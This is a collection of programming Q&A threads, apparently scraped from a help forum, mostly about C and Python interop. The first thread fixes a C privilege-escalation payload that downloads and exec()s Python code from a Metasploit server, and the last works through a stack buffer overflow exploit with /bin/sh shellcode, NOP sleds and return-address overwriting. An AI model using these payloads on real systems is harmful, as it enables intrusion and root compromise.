How to stop URL from being commented out (C) - python

I've been attempting a privilege escalation exploit on Linux, and it will run whatever file is at /tmp/run as the root user (Linux kernel 2.6 UDEV exploit). I've decided to make my payload in C (for an added challenge). It simply needs to execute a single python command (generated by Metasploit's web delivery module). The issue is, when I enter a URL as a string, the // in http:// will comment out the rest of the URL.
I don't know much C, so I have no idea how to fix this issue. This may seem a bit noob-ish, but I really can't find an answer anywhere.
Current code:
#include <stdio.h>
int main(void) {
system("python -c \"import urllib2; r = urllib2.urlopen('http://0.0.0.0:8080/tmmPIejv70OV'); exec(r.read());\"" <== // in http:// comments out rest of line
return 0;
}
Is there a proper way to fix this?

// does not start a comment inside a string literal, so the // in the URL is not the problem. The code you posted is missing the closing ); at the end of the system call. Note also that system is declared in <stdlib.h>, not <stdio.h>.
#include <stdio.h>
#include <stdlib.h>
int main(void) {
system("python -c \"import urllib2; r = urllib2.urlopen('http://0.0.0.0:8080/tmmPIejv70OV'); exec(r.read());\"");
return 0;
}

Related

The correct CMakeLists.txt file to call a MAXON library in a Python script using pybind11

I'm very new to CMake. Following this post and this one, I now want to call a MAXON function from Python using pybind11. What I have done so far:
The library can be downloaded from this page (direct download link).
wget https://www.maxongroup.com/medias/sys_master/root/8837358518302/EPOS-Linux-Library-En.zip
unzip:
unzip EPOS-Linux-Library-En.zip
make the install shell script executable and run it:
chmod +x ./install.sh
sudo ./install.sh
Then going to the example folder:
cd /opt/EposCmdLib_6.6.1.0/examples/HelloEposCmd/
Now combining the CMakeLists.txt files from here:
# CMakeLists.txt
cmake_minimum_required(VERSION 2.8.12)
project (HelloEposCmd)
set(CMAKE_CXX_FLAGS_DEBUG "${CMAKE_CXX_FLAGS_DEBUG} -Wall")
set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} -Wall")
set(CMAKE_POSITION_INDEPENDENT_CODE ON)
find_package(pybind11 REQUIRED)
pybind11_add_module(${PROJECT_NAME} HelloEposCmd.cpp)
add_executable(${PROJECT_NAME} HelloEposCmd.cpp)
target_link_libraries(${PROJECT_NAME} -lEposCmd)
In HelloEposCmd.cpp, this line is added right after the other header includes:
#include <pybind11/pybind11.h>
the main function is renamed to:
int run(int argc, char** argv)
and the pybind11 syntax to add the module is written at the end:
PYBIND11_MODULE(HelloEposCmd, m) {
m.def("run", &run, "runs the HelloEposCmd");
}
However, when I run cmake . I get the error:
CMake Error at CMakeLists.txt:13 (add_executable):
add_executable can not create target "HelloEposCmd" because another target with the same name already exists. The existing target is a module library created in source directory "/opt/EposCmdLib_6.6.1.0/examples/HelloEposCmd" See documentation for policy CMP0002 for more details.
...
I was wondering if you could kindly help me get the right CMakeLists.txt file. Ideally, I should be able to call the compiled module in Python:
# HelloEposCmd.py
import HelloEposCmd
HelloEposCmd.run()
Thanks for your support in advance.
pybind11_add_module already creates a target for you, so you don't need add_executable anymore. Just remove that line; when you build, you will get a library named HelloEposCmd.
add_executable is needed only if you are building an executable (.exe), which I believe is not what you want.
The pybind11 documentation says:
This function behaves very much like CMake’s builtin add_library (in fact, it’s a wrapper function around that command).
Thanks to abhilb's post and his kind follow-up in the comments, I was able to figure the problem out, or at least find a temporary workaround:
According to this post, the last two lines of the CMakeLists.txt file should change to
# this line can be removed
# add_executable(${PROJECT_NAME} HelloEposCmd.cpp)
target_link_libraries(${PROJECT_NAME} PRIVATE -lEposCmd)
Then, because pybind11 doesn't support double pointers (according to this post), we change the run function to:
int run() {
int argc = 1;
char* argv[] = {"./HelloEposCmd"};
...
}
which I suppose is a horrible workaround (inspired by information from this page). Now running cmake ., make, and python3 HelloEposCmd.py should work properly (apart from a small C++ warning).
P.S.1. Maybe someone could use std::vector<std::string> as suggested here. This idea was proposed here and there are already some answers worth investigating.
P.S.2. Following this discussion, another workaround could be something like:
#include <stdio.h>
#include <stdlib.h>
void myFunc(int argc, char* argv[]) {
for (int i = 0; i < argc; ++i) {
printf("%s\n", argv[i]);
}
}
int run(int argc, long* argv_) {
char** argv = (char**)malloc(argc * sizeof(char*));
for (int i = 0; i < argc; ++i) {
argv[i] = (char*)(argv_[i]);
}
myFunc(argc, argv);
free(argv);
return 0;
}

Python C API free() errors after using Py_SetPath() and Py_GetPath()

I'm trying to figure out why I can't simply get and set the python path through its C API. I am using Python3.6, on Ubuntu 17.10 with gcc version 7.2.0. Compiling with:
gcc pytest.c `python3-config --libs` `python3-config --includes`
#include <Python.h>
int main()
{
Py_Initialize(); // removes error if put after Py_SetPath
printf("setting path\n"); // prints
Py_SetPath(L"/usr/lib/python3.6"); // Error in `./a.out': free(): invalid size: 0x00007fd5a8365030 ***
printf("success\n"); // doesn't print
return 0;
}
Setting the path works fine, unless I also try to get the path prior to doing so. If I get the path at all, even just to print without modifying the returned value or anything, I get a "double free or corruption" error.
Very confused. Am I doing something wrong or is this a bug? Anyone know a workaround if so?
Edit: Also errors after calling Py_Initialize();. Updated code. Now errors even if I don't call Py_GetPath() first.
According to alk, this seems related to this bug: https://bugs.python.org/issue31532
Here is the workaround I am using. Since you can't call Py_GetPath() before Py_Initialize(), and also seemingly you can't call Py_SetPath() after Py_Initialize(), you can add to or get the path like this after calling Py_Initialize():
#include <Python.h>
int main()
{
Py_Initialize();
// get handle to python sys.path object
PyObject *sys = PyImport_ImportModule("sys");
PyObject *path = PyObject_GetAttrString(sys, "path");
// make a list of paths to add to sys.path
PyObject *newPaths = PyUnicode_Split(PyUnicode_FromWideChar(L"a:b:c", -1), PyUnicode_FromWideChar(L":", 1), -1);
// iterate through list and add all paths
for(int i=0; i<PyList_Size(newPaths); i++) {
PyList_Append(path, PyList_GetItem(newPaths, i));
}
// print out sys.path after appends
PyObject *newlist = PyUnicode_Join(PyUnicode_FromWideChar(L":", -1), path);
printf("newlist = %ls\n", PyUnicode_AsWideCharString(newlist, NULL));
return 0;
}
[the below answer refers to this version of the question.]
From the docs:
void Py_Initialize()
Initialize the Python interpreter. In an application embedding Python, this should be called before using any other Python/C API functions; with the exception of Py_SetProgramName(), Py_SetPythonHome() and Py_SetPath().
But the code you show calls Py_GetPath() before it calls Py_Initialize(), which, per the paragraph above, it should not.

Wrapper DLL for Python: "fatal error LNK1127: library is corrupt"

Brief description
I have a DLL programmed in ADA with GNAT. I want to compile with MSVC another DLL in C as a wrapper to the ADA_DLL in order to use it with Python.
I have compiled the ada_DLL, then I have generated the .lib file according to gnat documentation about MSVC. And finally I tried to compile the C_DLL with Visual-Studio, getting the error:
libmath.lib : fatal error LNK1127: library is corrupt
Update: When compiling with gcc as suggested by @Brian, I get the following output:
>"C:\GNAT\2015\bin\gcc.exe" -c -IC:\Python27\include -o libmath_c.o libmath_c.c
>"C:\GNAT\2015\bin\gcc.exe" -shared -LC:\Python27\libs -L./ -l libmath -o DIVISION_CPP.pyd libmath_c.o -lpython27
.//libmath.lib: error adding symbols: Malformed archive
collect2.exe: error: ld returned 1 exit status
Things I tried & more data:
I have tried importing the ADA_DLL directly with ctypes in Python and it works, so I believe that the ADA_DLL is correctly compiled. Also, forgetting about the C_DLL is not really an option.
I did a small example with a division example module. My .def file looks something like:
; dlltool -z libmath.def --export-all-symbols libmath.dll
EXPORTS
[...]
div @ 259
[...]
The libmath_c.c:
#include "libmath_c.h"
PyObject* _wrap_DIVISION(PyObject *self, PyObject *args){
div(10, 2);
Py_RETURN_NONE; /* returns Py_None with its reference count incremented */
}
__declspec(dllexport) void __cdecl initDIVISION_CPP(void){
Py_InitModule("DIVISION_CPP", LIB_METHODS_methods);
}
The libmath_c.h:
#include <windows.h>
#include <stdio.h>
#include <Python.h>
PyObject* _wrap_DIVISION(PyObject *self, PyObject *args);
static PyMethodDef LIB_METHODS_methods[] = {
{ "CPP_DIVISION", _wrap_DIVISION, METH_VARARGS },
{NULL, NULL, 0, NULL} // Added as indicated by @Brian. Thanks!
};
__declspec(dllexport) void __cdecl initDIVISION_CPP(void);
Any idea of what is happening? Any help would be really appreciated. Thanks!
Preamble: Apologies if this turns out to be a non-answer; I want to be able to come back to this and find the links again, and comments tend to rot...
First, gcc (in the version matching Gnat) may work as an alternative C compiler, and if it does, it may eliminate difficulties with incompatible library versions.
GCC can be used for building Windows DLLs so the result should be usable from other Windows executables.
Following comments; gcc does appear to allow compilation, but the result is not currently usable from Python - here, my Python knowledge is shallow, and we don't have an MCVE, so this is speculative:
This Q&A addresses the same error message between Python and pure C, with no Ada, suggesting this error may not be specific to C-wrapped Ada.
You have already bypassed the asker's specific error,
static PyMethodDef* _npfindmethods = { ... };
which was using a pointer; you are (correctly according to the answer) statically allocating an array. However, the accepted answer terminates the list of methods
static PyMethodDef _npfindmethods[] = {
{"add", py_add, METH_VARARGS, py_add_doc},
{NULL, NULL, 0, NULL}
};
with a NULL method; your example does not:
static PyMethodDef LIB_METHODS_methods[] = {
{ "CPP_DIVISION", _wrap_DIVISION, METH_VARARGS }
};
So my hypothesis is that when you run setup() on this module, it finds CPP_DIVISION successfully, then in the absence of a NULL method it runs off into the weeds, producing the same symptoms despite the difference in cause.
I could test this hypothesis using the MCVE in that question by deleting the NULL method; however I don't have a Windows system handy, only Linux.
Alternatively, I see no reason for a C layer. If there isn't one, this Q&A addresses direct interaction between Python and Ada with no C layer, though it appears to use a different method, getattr() to import the external method. Might be an alternative?
Finally I managed to compile with gcc+gnat but not with MSVC+gnat.
With gcc+gnat, I was getting .//libmath.lib: error adding symbols: Malformed archive. The solution is to link against libmath.dll directly instead of building a .lib from the .dll.
So, in summary:
If you have a .dll generated by gnat, use it with gcc. You don't need to build a .lib.
If you have a .lib (for example python27.lib) or a .dll not generated by gnat, convert it to a .a using a tool like "pexport" (DO NOT USE SED!).
If you really need to compile using the MSVC... I'm sorry, I could not manage to make it work. Your princess is in another castle.

How can I get the new name of a renamed file given its file descriptor/object? [duplicate]

Is it possible to get the filename of a file descriptor (Linux) in C?
You can use readlink on /proc/self/fd/NNN where NNN is the file descriptor. This will give you the name of the file as it was when it was opened — however, if the file was moved or deleted since then, it may no longer be accurate (although Linux can track renames in some cases). To verify, stat the filename given and fstat the fd you have, and make sure st_dev and st_ino are the same.
Of course, not all file descriptors refer to files, and for those you'll see some odd text strings, such as pipe:[1538488]. Since all of the real filenames will be absolute paths, you can determine which these are easily enough. Further, as others have noted, files can have multiple hardlinks pointing to them - this will only report the one it was opened with. If you want to find all names for a given file, you'll just have to traverse the entire filesystem.
I had this problem on Mac OS X. We don't have a /proc virtual file system, so the accepted solution cannot work.
We do, instead, have a F_GETPATH command for fcntl:
F_GETPATH Get the path of the file descriptor Fildes. The argu-
ment must be a buffer of size MAXPATHLEN or greater.
So to get the file associated to a file descriptor, you can use this snippet:
#include <sys/syslimits.h>
#include <fcntl.h>
char filePath[PATH_MAX];
if (fcntl(fd, F_GETPATH, filePath) != -1)
{
// do something with the file path
}
Since I never remember where MAXPATHLEN is defined, I thought PATH_MAX from syslimits would be fine.
In Windows, with GetFileInformationByHandleEx, passing FileNameInfo, you can retrieve the file name.
As Tyler points out, there's no way to do what you require "directly and reliably", since a given FD may correspond to 0 filenames (in various cases) or > 1 (multiple "hard links" is how the latter situation is generally described). If you do still need the functionality with all the limitations (on speed AND on the possibility of getting 0, 2, ... results rather than 1), here's how you can do it: first, fstat the FD -- this tells you, in the resulting struct stat, what device the file lives on, how many hard links it has, whether it's a special file, etc. This may already answer your question -- e.g. if 0 hard links you will KNOW there is in fact no corresponding filename on disk.
If the stats give you hope, then you have to "walk the tree" of directories on the relevant device until you find all the hard links (or just the first one, if you don't need more than one and any one will do). For that purpose, you use readdir (and opendir &c of course) recursively opening subdirectories until you find in a struct dirent thus received the same inode number you had in the original struct stat (at which time if you want the whole path, rather than just the name, you'll need to walk the chain of directories backwards to reconstruct it).
If this general approach is acceptable, but you need more detailed C code, let us know, it won't be hard to write (though I'd rather not write it if it's useless, i.e. you cannot withstand the inevitably slow performance or the possibility of getting != 1 result for the purposes of your application;-).
Before writing this off as impossible I suggest you look at the source code of the lsof command.
There may be restrictions but lsof seems capable of determining the file descriptor and file name. This information exists in the /proc filesystem so it should be possible to get at from your program.
You can use fstat() to get the file's inode by struct stat. Then, using readdir() you can compare the inode you found with those that exist (struct dirent) in a directory (assuming that you know the directory, otherwise you'll have to search the whole filesystem) and find the corresponding file name.
Nasty?
There is no official API to do this on OpenBSD, though with some very convoluted workarounds, it is still possible with the following code, note you need to link with -lkvm and -lc. The code using FTS to traverse the filesystem is from this answer.
#include <string>
#include <vector>
#include <climits>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <sys/stat.h>
#include <fts.h>
#include <sys/sysctl.h>
#include <kvm.h>
using std::string;
using std::vector;
string pidfd2path(int pid, int fd) {
string path; char errbuf[_POSIX2_LINE_MAX];
static kvm_t *kd = nullptr; kinfo_file *kif = nullptr; int cntp = 0;
kd = kvm_openfiles(nullptr, nullptr, nullptr, KVM_NO_FILES, errbuf); if (!kd) return "";
if ((kif = kvm_getfiles(kd, KERN_FILE_BYPID, pid, sizeof(struct kinfo_file), &cntp))) {
for (int i = 0; i < cntp; i++) {
if (kif[i].fd_fd == fd) {
FTS *file_system = nullptr; FTSENT *child = nullptr; FTSENT *parent = nullptr;
vector<char *> root; char buffer[2]; strcpy(buffer, "/"); root.push_back(buffer);
file_system = fts_open(&root[0], FTS_COMFOLLOW | FTS_NOCHDIR, nullptr);
if (file_system) {
while ((parent = fts_read(file_system))) {
child = fts_children(file_system, 0);
for (; child; child = child->fts_link) { // visit every child, including the first
if (!S_ISSOCK(child->fts_statp->st_mode)) {
if (child->fts_statp->st_dev == kif[i].va_fsid) {
if (child->fts_statp->st_ino == kif[i].va_fileid) {
path = child->fts_path + string(child->fts_name);
goto finish;
}
}
}
}
}
finish:
fts_close(file_system);
}
}
}
}
kvm_close(kd);
return path;
}
int main(int argc, char **argv) {
if (argc == 3) {
printf("%s\n", pidfd2path((int)strtoul(argv[1], nullptr, 10),
(int)strtoul(argv[2], nullptr, 10)).c_str());
} else {
printf("usage: \"%s\" <pid> <fd>\n", argv[0]);
}
return 0;
}
If the function fails to find the file, (for example, because it no longer exists), it will return an empty string. If the file was moved, in my experience when moving the file to the trash, the new location of the file is returned instead if that location wasn't already searched through by FTS. It'll be slower for filesystems that have more files.
The deeper the search goes into the directory tree of your filesystem without finding the file, the more likely you are to hit a race condition, though that is still very unlikely given how fast this is. I'm aware my OpenBSD solution is C++ and not C. Feel free to change it to C; most of the code logic will be the same. If I have time, I'll try to rewrite it in C. Like macOS, this solution gets a hard link at random (citation needed), for portability with Windows and other platforms which can only get one hard link. You could remove the goto finish in the inner loop and return a vector if you don't care about being cross-platform and want to get all the hard links.
DragonFly BSD and NetBSD have the same solution (the exact same code) as the macOS solution on the current question, which I verified manually. If a macOS user wishes to get a path from a file descriptor opened by any process, by plugging in a process ID, and not be limited to just the calling one, while also potentially getting all hard links rather than a random one, see this answer. It should be a lot more performant than traversing your entire filesystem, similar to how fast it is on Linux and other solutions that are more straightforward. FreeBSD users can get what they are looking for in this question, because the OS-level bug mentioned in that question has since been resolved in newer OS versions.
Here's a more generic solution. It can only retrieve the path of a file descriptor opened by the calling process, but it should work on most Unix-likes out of the box. The same concerns about hard links and race conditions apply as for the former solution, although it performs slightly faster because it has fewer branches and loops:
#include <string>
#include <vector>
#include <cstring>
#include <sys/stat.h>
#include <fts.h>
using std::string;
using std::vector;
string fd2path(int fd) {
string path;
FTS *file_system = nullptr; FTSENT *child = nullptr; FTSENT *parent = nullptr;
vector<char *> root; char buffer[2]; strcpy(buffer, "/"); root.push_back(buffer);
file_system = fts_open(&root[0], FTS_COMFOLLOW | FTS_NOCHDIR, nullptr);
if (file_system) {
while ((parent = fts_read(file_system))) {
child = fts_children(file_system, 0);
for (; child; child = child->fts_link) { // visit every child, including the first
struct stat info = { 0 };
if (!S_ISSOCK(child->fts_statp->st_mode)) {
if (!fstat(fd, &info) && !S_ISSOCK(info.st_mode)) {
if (child->fts_statp->st_dev == info.st_dev) {
if (child->fts_statp->st_ino == info.st_ino) {
path = child->fts_path + string(child->fts_name);
goto finish;
}
}
}
}
}
}
finish:
fts_close(file_system);
}
return path;
}
An even quicker solution, also limited to the calling process, is to wrap all your calls to fopen() and open() in a helper function that stores each file descriptor together with the absolute path of what was passed to the wrapper, in whatever C equivalent of a std::unordered_map you have (you will likely have to write it yourself using malloc()'d and eventually free()'d int and C-string arrays). The same applies to the Windows-only equivalents, which won't work on UWP, like _wopen_s() and all that nonsense to support UTF-8. The absolute path can be obtained with realpath() on Unix-likes, or GetFullPathNameW() (*W for UTF-8 support) on Windows. realpath() will resolve symbolic links (which aren't nearly as commonly used on Windows), and realpath() / GetFullPathNameW() will convert the path you opened from a relative path, if it is one, to an absolute path.
This will again be faster than any solution that does a dynamic search of your filesystem, but it has a different and unappealing limitation: it will not notice files that were moved around on your filesystem. You can at least check whether the file was deleted by testing for existence in your own code, but it also won't notice whether the file was replaced since you opened it and stored the path in memory, so it can give you outdated results. Let me know if you would like to see a code example of this, though because files can change location I do not recommend this solution.
Impossible. A file descriptor may have multiple names in the filesystem, or it may have no name at all.
Edit: Assuming you are talking about a plain old POSIX system, without any OS-specific APIs, since you didn't specify an OS.

Why is my stack buffer overflow exploit not working?

So I have a really simple stack overflow:
#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
I'm trying to overflow with this code:
$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.
Does anyone see the problem? Note: My python may be wrong.
UPDATE
What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so,
$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
UPDATE
Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?
UPDATE
Nevermind ya'll, I got it working. Thanks for all your help.
UPDATE
Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.
All I'm doing is overflowing the stack at the beginning and pointing my shellcode there.
Like so,
r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
This should point to the A's. Now what I don't understand is why my address at the end gets changed in gdb.
This is what gdb gives me,
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?
When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?
Any help would be appreciated.
Also, I'm compiling with the following options:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
It's really odd because any other address works except the one I need.
UPDATE
I can successfully spawn a shell with the following in gdb,
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spawn a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.
For instance, now when I run the following I get this in gdb...
Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
This seems to be caused by execstack being turned on.
UPDATE
Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.
There are several protections against this attack that come straight from the compiler. For example, your stack may not be executable.
readelf -l <filename>
if your output contains something like this:
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
this means that you can only read and write on the stack ( so you should "return to libc" to spawn your shell).
Also there could be a canary protection, meaning there is a part of the memory between your variables and the instruction pointer that contains a phrase that is checked for integrity and if it is overwritten by your string the program will exit.
If you are trying this on your own program, consider removing some of the protections with gcc options:
gcc -z execstack
Also a note on your assembly, you usually include nops before your shell code, so you don't have to target the exact address that your shell code is starting.
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
Note that in the address that should be placed inside the instruction pointer
you can modify the last hex digits to point somewhere inside your nops and not
necessarily at the beginning of your buffer.
Of course gdb should become your best friend if you are trying something
like that.
Hope this helps.
This isn't going to work too well [as written]. However, it is possible, so read on ...
It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.
Assuming a POSIX OS (e.g. linux), the kernel will set the stack pointer at a fixed address.
The kernel does the following:
It calculates how much space is needed for the environment variable strings (i.e. strlen("HOME=/home/me") + 1 for all environment variables) and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then calculates how many there were (e.g. envcount), creates a char *envp[envcount + 1] on the stack, and fills in the envp values with pointers to the given strings. It null terminates this envp.
A similar process is done for the argv strings.
Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. _start from crt0.o) which does some init and then calls main(argc,argv,envp)
This is [sort of] what the stack looks like when main gets called:
"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
// address of "HOME" string
// address of "LOGNAME" string
// address of "SHELL" string
NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
// pointer to argument string 0
// pointer to argument string 1
// pointer to argument string 2
NULL
}
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
On an x86, the argc, argv, and envp pointer values are put into the first three argument registers of the x86 ABI.
Here's the problem [problems, plural, actually] ...
By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must be RIP-relative addressing and [probably] built with -fPIC.
And, the resultant code can't have a zero byte in the middle because this is being conveyed [by the kernel] as an EOS terminated string. So, a string that has a zero (e.g. <byte0>,<byte1>,<byte2>,0x00,<byte5>,<byte6>,...) would only transfer the first three bytes and not the entire shell code program.
Nor do you have a good idea as to what the stack pointer value is.
Also, you need to find the memory word on the stack that has the return address in it (i.e. this is what the start function's call main asm instruction pushes).
This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (e.g. buf). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.
Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.
Here's the [easy] solution ...
gcc has some intrinsic functions that can help: __builtin_return_address, __builtin_frame_address.
So, get the value of the real return address from the intrinsic [call this retadr]. Get the address of the stack frame [call this fp].
Starting from fp and incrementing (by sizeof(void*)) toward higher memory, find a word that matches retadr. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8
So, then do: *fp = argv[1] and return.
Note, extra steps may be necessary because if the stack has the NX bit set, the string pointed to by argv[1] is on the stack as mentioned above.
Here is some example code that works:
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
void
shellcode(void)
{
static char buf[] = "shellcode: hello\n";
char *cp;
for (cp = buf; *cp != 0; ++cp);
// NOTE: in real shell code, we couldn't rely on using this function, so
// these would need to be the CPP macro versions: _syscall3 and _syscall2
// respectively or the syscall function would need to be _statically_
// linked in
syscall(SYS_write,1,buf,cp - buf);
syscall(SYS_exit,0);
}
int
main(int argc,char **argv)
{
void *retadr = __builtin_return_address(0);
void **fp = __builtin_frame_address(0);
int iter;
printf("retadr=%p\n",retadr);
printf("fp=%p\n",fp);
// NOTE: for your example, replace:
// *fp = (void *) shellcode;
// with:
// *fp = (void *) argv[1]
for (iter = 20; iter > 0; --iter, fp += 1) {
printf("fp=%p %p\n",fp,*fp);
if (*fp == retadr) {
*fp = (void *) shellcode;
break;
}
}
if (iter <= 0)
printf("main: no match\n");
return 0;
}
I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:
unsigned long printesp(void){
__asm__("movl %esp,%eax");
}
And called it at the end of main, right before the return, to get an idea of where the stack was. From there I just played with that value, subtracting 4 from the printed ESP until it worked.
